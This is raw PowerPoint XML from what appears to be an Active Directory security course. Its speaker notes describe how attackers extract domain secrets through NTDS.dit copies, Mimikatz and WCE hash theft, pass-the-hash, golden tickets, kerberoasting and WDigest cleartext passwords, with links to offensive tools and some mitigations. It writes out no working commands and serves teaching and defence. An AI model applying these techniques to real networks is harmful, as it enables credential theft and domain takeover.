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43"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId44"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="798" r:id="rId5"/>
    <p:sldId id="739" r:id="rId6"/>
    <p:sldId id="890" r:id="rId7"/>
    <p:sldId id="896" r:id="rId8"/>
    <p:sldId id="897" r:id="rId9"/>
    <p:sldId id="901" r:id="rId10"/>
    <p:sldId id="906" r:id="rId11"/>
    <p:sldId id="951" r:id="rId12"/>
    <p:sldId id="961" r:id="rId13"/>
    <p:sldId id="907" r:id="rId14"/>
    <p:sldId id="962" r:id="rId15"/>
    <p:sldId id="909" r:id="rId16"/>
    <p:sldId id="911" r:id="rId17"/>
    <p:sldId id="954" r:id="rId18"/>
    <p:sldId id="955" r:id="rId19"/>
    <p:sldId id="910" r:id="rId20"/>
    <p:sldId id="892" r:id="rId21"/>
    <p:sldId id="893" r:id="rId22"/>
    <p:sldId id="806" r:id="rId23"/>
    <p:sldId id="894" r:id="rId24"/>
    <p:sldId id="895" r:id="rId25"/>
    <p:sldId id="952" r:id="rId26"/>
    <p:sldId id="953" r:id="rId27"/>
    <p:sldId id="903" r:id="rId28"/>
    <p:sldId id="898" r:id="rId29"/>
    <p:sldId id="899" r:id="rId30"/>
    <p:sldId id="959" r:id="rId31"/>
    <p:sldId id="900" r:id="rId32"/>
    <p:sldId id="905" r:id="rId33"/>
    <p:sldId id="957" r:id="rId34"/>
    <p:sldId id="958" r:id="rId35"/>
    <p:sldId id="904" r:id="rId36"/>
    <p:sldId id="902" r:id="rId37"/>
    <p:sldId id="913" r:id="rId38"/>
    <p:sldId id="960" r:id="rId39"/>
    <p:sldId id="950" r:id="rId40"/>
    <p:sldId id="676" r:id="rId41"/>
    <p:sldId id="949" r:id="rId42"/>
  </p:sldIdLst>
  <p:sldSz cx="12436475" cy="6994525"/>
  <p:notesSz cx="6781800" cy="9067800"/>
  <p:custDataLst>
    <p:tags r:id="rId45"/>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F9ADF2F-6FF9-4209-A79E-E049D158E0F0}">
          <p14:sldIdLst>
            <p14:sldId id="798"/>
            <p14:sldId id="739"/>
            <p14:sldId id="890"/>
            <p14:sldId id="896"/>
            <p14:sldId id="897"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="The database" id="{D2EFBD8B-8DD7-40FD-86B1-7891738D8F8B}">
          <p14:sldIdLst>
            <p14:sldId id="901"/>
            <p14:sldId id="906"/>
            <p14:sldId id="951"/>
            <p14:sldId id="961"/>
            <p14:sldId id="907"/>
            <p14:sldId id="962"/>
            <p14:sldId id="909"/>
            <p14:sldId id="911"/>
            <p14:sldId id="954"/>
            <p14:sldId id="955"/>
            <p14:sldId id="910"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="NTLM" id="{5FCE329C-AE1E-45A7-ACAB-8ECFDB490A9E}">
          <p14:sldIdLst>
            <p14:sldId id="892"/>
            <p14:sldId id="893"/>
            <p14:sldId id="806"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Kerberos" id="{4DDF97C5-41AC-46AF-B456-781E75DB3B2E}">
          <p14:sldIdLst>
            <p14:sldId id="894"/>
            <p14:sldId id="895"/>
            <p14:sldId id="952"/>
            <p14:sldId id="953"/>
            <p14:sldId id="903"/>
            <p14:sldId id="898"/>
            <p14:sldId id="899"/>
            <p14:sldId id="959"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Wdigest" id="{FEE1E197-DB41-472E-82CA-C773DFF46C7E}">
          <p14:sldIdLst>
            <p14:sldId id="900"/>
            <p14:sldId id="905"/>
            <p14:sldId id="957"/>
            <p14:sldId id="958"/>
            <p14:sldId id="904"/>
            <p14:sldId id="902"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Offline" id="{D8EB1725-C901-4447-9FF6-BBF49F64F4D7}">
          <p14:sldIdLst>
            <p14:sldId id="913"/>
            <p14:sldId id="960"/>
            <p14:sldId id="950"/>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31225-6008-40E5-9054-069D3F59D687}" v="1" dt="2018-10-28T23:03:38.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4641" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="91" d="100"/>
          <a:sy n="91" d="100"/>
        </p:scale>
        <p:origin x="1254"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this section, we are looking at the techniques an attacker can leverage to obtain the domain’s secrets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>Although the following slides might mention some mitigation techniques, the hardening and the mitigation of these attacks are dealt with in the next section.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IFM files can be generated with the NTDSUTIL utility. More information about it here: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc770654(v=ws.10)</a:t>
            </a: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2077120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Ref: https://www.dsinternals.com/en/dumping-ntds-dit-files-using-powershell/</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32642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If you can get the password of an account used on those network devices, you own the domain.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648132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Ref: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>DSInternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> https://www.dsinternals.com/en/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> http://blog.gentilkiwi.com/mimikatz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2539494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6684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4111185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a:t>In this video, you can see:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" noProof="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" noProof="0"/>
              <a:t>- An attacker extracting all account’s secrets using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" noProof="0" err="1"/>
              <a:t>DSInternals</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" noProof="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" noProof="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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3566030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809775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Here are two of the most common tools to extract and/or inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NTHashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.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WCE works only up to Windows Server 2008 and Windows 8 (and lower versions).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> latest binaries can work on pretty much all versions of Windows. </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Ref: WCE https://www.ampliasecurity.com/research/windows-credentials-editor/</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4037586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a:t>In this video, you can see:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" noProof="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" noProof="0"/>
              <a:t>An attacker extracting all NT hashes using WCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" noProof="0"/>
              <a:t>An attacker performing a pass-the-hash attack with WCE</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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164745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Now that the TGT and the associated session key are in memory, they can be used to request legitimate service tickets.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4282427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1190672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The previous compromise can be a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> attack or a copy of the database (or backup of the database).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tickets are valid for 10 hours because the domain Kerberos policy says so. If you are crafting your own TGT, you can make your own rules. Note that using a ticket with a custom validity time makes it somewhat easier for the defense to identify it as a rogue ticket.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89335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305350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a:t>In this video, you can see:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" noProof="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" noProof="0"/>
              <a:t>An attacker extracting cached Kerberos tickets using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" noProof="0" err="1"/>
              <a:t>Mimikakz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" noProof="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" noProof="0"/>
              <a:t>An attacker creating a golden ticket using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" noProof="0" err="1"/>
              <a:t>Mimikakz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" noProof="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" noProof="0"/>
              <a:t>An attacker using a golden ticket using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" noProof="0" err="1"/>
              <a:t>Mimikakz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" noProof="0"/>
              <a:t> </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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2195380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1927005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Remember the conditions for PAC verifications! These were seen in module 1 section 2.</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4285763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Ref: https://github.com/nidem/kerberoast</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414916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b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Let’s be clear. Windows does not store the passwords in the clear. It does it with a reversible encryption. And because local admins have access to the key, local admins can decrypt it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Arial" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Digest and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>WDigest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Arial" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>WDigest.dll was introduced in the Windows XP operating system The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges, as documented in RFCs 2617 and 2831. These exchanges require that parties that seek to authenticate must demonstrate their knowledge of secret keys. This process improves upon earlier versions of HTTP authentication, in which users provide passwords that are not encrypted when they are sent to a server, leaving them vulnerable to capture by attackers, or that are encrypted but sent in an expensive, ongoing, Secure Sockets Layer (SSL) session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Digest Authentication has similar security characteristics to the proprietary NTLM protocol. Both Digest Authentication and NTLM are challenge/response protocols. Challenge/response protocols require an authenticating server to generate a challenge containing some amount of unpredictable data. A client then uses a key derived from the user’s password to encrypt the challenge and forms a response. The server, or a trusted service such as Active Directory, can verify that the user possesses the correct password by comparing the client’s encrypted response to a stored response based on the credential associated with the user in Active Directory or in the server account database for local users. If the responses match, the user is authenticated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Digest authentication is successful only if the domain controller has a reversibly encrypted (plaintext) copy of the requesting user's password stored in AD DS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(either on the entire domain – via the default domain password policy, or on the user account – via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>useraccountcontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute). </a:t>
            </a:r>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1076786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KB2871997 does not disabled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wdigest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> but gives the ability to disable it by creating/setting the value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>UseLogonCredential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = dword:00000000 under \HKLM\System\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\Control\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SecurityProviders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wdigest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Windows Server 2008, Windows Vista and lower, there is no supported way to do it but can be achieved by removing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wdigest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> entry from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>\HKLM\System\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>\Control\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Lsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>\Security Packages registry value.</a:t>
            </a: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168677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It is very important to understand that those tools aren’t really exploiting vulnerabilities of the system. Nonetheless, all the tools mentioned in this section are prevented from running by most anti-malware and anti-virus (detected as “hacking” tools, or because they are sometimes embedded in actual malware, as a specific malware strain).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433104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659477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3921438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a:t>In this video, you can see:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" noProof="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" noProof="0"/>
              <a:t>An attacker extracting the clear-text passwords of all connected users using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" noProof="0" err="1"/>
              <a:t>Mimikakz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" noProof="0"/>
              <a:t> </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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2775294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Digest Authentication Works https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc780170(v%3dws.10)</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351082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Either an LSASS dump or a full dump of the whole machine’s memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Because memory dumps are sometimes stored in an unsecured manner (in an open file share, or worse, on an Internet forum post as an attachment – when admins are seeking help for the dump analysis).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676760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3538999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err="1"/>
              <a:t>Keytab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> files are binary files Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(and sometimes Java applications on a Windows environment) used to beneficiate from the forest SSO.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Yes, we could have covered this in the Kerberos section…</a:t>
            </a:r>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a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3170739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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3522418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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361313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170180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328571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You can also be an indirect member of these groups. For example, members of the Domain Admins group are members of the built-in Administrators group.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414691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dirty="0"/>
              <a:t>The following article explains how to proceed with wmic.exe: https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is PowerShell cmdlet called Invoke-NinjaCopy.ps1 which can be used to copy files being used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See here: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The virtualization platform administrators could steal the NTDS.DIT database as well as accessing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>the full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>memory of the DCs (that includes the LSASS memory).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="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148854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noProof="0"/>
              <a:t>In this video, you can see:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" noProof="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" noProof="0"/>
              <a:t>An attacker remotely copying the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" noProof="0" err="1"/>
              <a:t>NTDS.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" noProof="0"/>
              <a:t> and SYSTEM hive using WMIC.EXE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" noProof="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" noProof="0"/>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2594530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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>From: https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/</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2785763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5642175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Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454125" y="6658519"/>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3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454125" y="439785"/>
            <a:ext cx="2106552"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800">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ECE Paris</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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7"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240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a:xfrm>
            <a:off x="274702" y="1934285"/>
            <a:ext cx="10095124" cy="1837298"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
